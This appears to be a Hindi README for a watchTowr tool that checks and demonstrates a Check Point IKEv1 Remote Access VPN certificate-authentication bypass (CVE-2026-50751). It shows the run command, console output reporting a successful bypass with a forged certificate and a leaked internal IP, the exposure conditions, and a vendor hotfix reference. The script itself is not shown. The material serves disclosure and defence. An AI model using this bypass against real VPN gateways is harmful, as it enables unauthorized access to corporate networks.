
डिटेक्शन आर्टिफैक्ट जनरेटर Check Point VPN IKEv1 प्रमाणपत्र-प्रमाणीकरण बाईपास (CVE-2026-50751) के लिए। गेटवे एक्सपोज़र का सत्यापन करता है और जाली प्रमाणपत्रों के माध्यम से अप्रमाणित रिमोट एक्सेस प्रदर्शित करता है।
एक Check Point Remote Access VPN IKEv1 प्रमाणपत्र-प्रमाणीकरण बाईपास डिटेक्शन आर्टिफैक्ट जनरेटर।
https://github.com/user-attachments/assets/1280c545-364e-42d1-94ac-5b2cd850d14e
तकनीकी विवरण के लिए हमारा ब्लॉग पोस्ट देखें।
$ python3 watchTowr-vs-Check-Point-CVE-2026-50751.py -rh vpn.example.com -u watchtowr
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Check-Point-CVE-2026-50751.py
(*) Check Point IKEv1 Remote-Access VPN certificate-auth bypass Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-50751]
[#] CVE-2026-50751 Check Point IKEv1 Remote-Access certificate-auth bypass
[+] Self-signed cert (untrusted); signature will be invalid (no private key)
[#] Connecting via udp ...
[#] Authenticating as 'watchtowr' with the forged certificate + invalid signature...
[#] Decrypting...
[+] Gateway Internal IP: 172.31.255.128
[+] [BYPASSED] Gateway authenticated us as 'watchtowr'. CVE-2026-50751 certificate-authentication bypass confirmed.
Python 3 और cryptography पैकेज की आवश्यकता है:
pip install cryptography
यह watchTowr डिटेक्शन आर्टिफैक्ट जनरेटर Check Point Remote Access VPN / Mobile Access प्रमाणीकरण बाईपास CVE-2026-50751 (CVSS 9.3, CWE-287) की जाँच करता है और प्रदर्शित करता है। एक दूरस्थ, अप्रमाणित हमलावर पुराने IKEv1 चरण-1 आदान-प्रदान को पूरा कर सकता है और बिना मान्य प्रमाणपत्र, निजी कुंजी या पासवर्ड के एक प्रावधानित रिमोट एक्सेस उपयोगकर्ता के रूप में प्रमाणित हो सकता है। यह IKE (UDP 500/4500) और Check Point Visitor Mode / SSL (रॉ TCP 443, TCPT) दोनों पर काम करता है।
एक गेटवे तब उजागर होता है जब इसे लीगेसी IKEv1 पथ के लिए कॉन्फ़िगर किया जाता है: लीगेसी रिमोट एक्सेस क्लाइंट की अनुमति, IKEv1 की अनुमति (केवल IKEv2 नहीं)। प्रमाणपत्र-प्रमाणीकरण बाईपास Certificate, Certificate with enrollment, और Mixed उपयोगकर्ता-प्रमाणीकरण विधियों पर लागू होता है; सादा Legacy (उपयोगकर्ता नाम/पासवर्ड) बाईपास नहीं किया जा सकता है।
निवारण और अधिक विवरण Check Point सलाह और हॉटफिक्स sk185033 में पाए जा सकते हैं:
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम को फॉलो करें।